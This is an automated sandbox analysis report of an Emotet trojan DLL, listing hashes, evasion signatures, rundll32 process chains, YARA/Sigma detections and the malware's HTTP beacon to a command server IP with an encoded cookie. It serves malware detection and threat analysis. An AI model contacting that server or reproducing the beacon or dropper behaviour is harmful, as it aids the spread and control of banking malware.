Windows Analysis Report efELSMI5R4

Overview

General Information

Sample Name: efELSMI5R4 (renamed file extension from none to dll)
Analysis ID: 532312
MD5: 1ec5996508211a8d174a1a09d6289463
SHA1: ede146abf146c0dfdb88431dfecf5cc80b267335
SHA256: 2933137a5e251f44b2e6d2cc919c8a679651a76b900b3b9e2b06edc73b64e5e6
Tags: 32, dll, exe, trojan

Most interesting Screenshot:

Detection

Emotet
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 5048 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6740 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6416 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • loaddll32.exe (PID: 6404 cmdline: loaddll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 2064 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6276 cmdline: rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6316 cmdline: rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 4244 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 360 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3176 cmdline: rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5960 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6044 cmdline: rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 2268 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1896 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 204 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5604 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3128 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7084 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | -
00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | -
00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | -
(5 of 35 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
13.2.rundll32.exe.3332418.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
13.2.rundll32.exe.3332418.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | -
2.0.loaddll32.exe.11e3b40.1.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
2.0.loaddll32.exe.11e3b40.1.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | -
2.0.loaddll32.exe.11e3b40.4.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
(5 of 75 entries shown)

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation
Source: Process started, Author: FPT.EagleEye, Data:
  Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
  CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\rundll32.exe
  NewProcessName: C:\Windows\SysWOW64\rundll32.exe
  OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
  ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu
  ParentImage: C:\Windows\SysWOW64\rundll32.exe
  ParentProcessId: 4244
  ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
  ProcessId: 360

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: efELSMI5R4.dll | Virustotal: Detection: 19%
Source: efELSMI5R4.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: unknown | HTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.3:49815 version: TLS 1.2
Source: efELSMI5R4.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.582794929.000000000058C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000016.00000002.597098712.0000000000432000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6ECF0927 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6ECF0927 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_009BE2C8 FindFirstFileW,

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.63.5.129 187
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected:
  GET /fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ HTTP/1.1
  Cookie: BPnBmsPHiG=8D4dsLTWN8wEGAED/TDSscJN6tz6UiW9Sa7p1L1j+sV8peUY3i4h541A7FXE4tOLJPvGODcUqyKdZRdd4eLVMSqHn/QSuYDzDawRyYOBXu6fQpi7mDqtISdNgCJdqllab7kmTC8JkExQ5QdDNiC5RaFQkQmH8lhmwU8xXoXh+j8s7+Z3BdjBH7uOOgjnzk8PadPgkEn5XuuSWvqAvHt+OIGRsSH4rQBUpgvQ1fCY/yKMeukT8WwcUdr5/JoJiNMk/ZsMMpoKYsGTM1YS3andCGr7w3voV5dtu6EWrfS2xnLTBepk11l/Ck/dvR9iQCeMbJwbV/hbshMw7htS0Fv4102otz0kFPNoh61rQXO2VxiWNrBF0xk=
  Host: 45.63.5.129
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
Source: unknown | TCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: svchost.exe, 0000001C.00000003.676499557.00000214D4D96000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ"
,"VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: WerFault.exe, 00000018.00000002.620064823.0000000004C18000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618456915.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618557628.0000000004C17000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618529956.0000000004C14000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.693696632.00000214D4D00000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001C.00000002.693406330.00000214D46EB000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: Amcache.hve.22.dr | String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001C.00000003.673502580.00000214D5202000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673473376.00000214D4D91000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673436832.00000214D4DA8000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673407994.00000214D4DA8000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_009A3394 InternetReadFile,
Source: global traffic | HTTP traffic detected:
  GET /fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ HTTP/1.1
  Cookie: BPnBmsPHiG=8D4dsLTWN8wEGAED/TDSscJN6tz6UiW9Sa7p1L1j+sV8peUY3i4h541A7FXE4tOLJPvGODcUqyKdZRdd4eLVMSqHn/QSuYDzDawRyYOBXu6fQpi7mDqtISdNgCJdqllab7kmTC8JkExQ5QdDNiC5RaFQkQmH8lhmwU8xXoXh+j8s7+Z3BdjBH7uOOgjnzk8PadPgkEn5XuuSWvqAvHt+OIGRsSH4rQBUpgvQ1fCY/yKMeukT8WwcUdr5/JoJiNMk/ZsMMpoKYsGTM1YS3andCGr7w3voV5dtu6EWrfS2xnLTBepk11l/Ck/dvR9iQCeMbJwbV/hbshMw7htS0Fv4102otz0kFPNoh61rQXO2VxiWNrBF0xk=
  Host: 45.63.5.129
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.3:49815 version: TLS 1.2

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 13.2.rundll32.exe.3332418.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.11e3b40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.1100000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.11e3b40.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.e12148.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.11e3b40.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.c920a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.11e3b40.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.1100000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.e12148.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.c920a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.932160.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.35a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.11e3b40.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.1100000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.rundll32.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.rundll32.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.11e3b40.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.1100000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.35a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.1100000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.loaddll32.exe.1100000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.3332418.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.860000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.932160.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.574084916.0000000000C7A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.660358890.000000000331A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.563477731.000000000091A000.00000004.00000020.sdmp, type: MEMORY

                      System Summary:

                      Source: efELSMI5R4.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\SysWOW64\rundll32.exe; File deleted: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee:Zone.Identifier
                      Source: C:\Windows\SysWOW64\rundll32.exe; File created: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B56E9
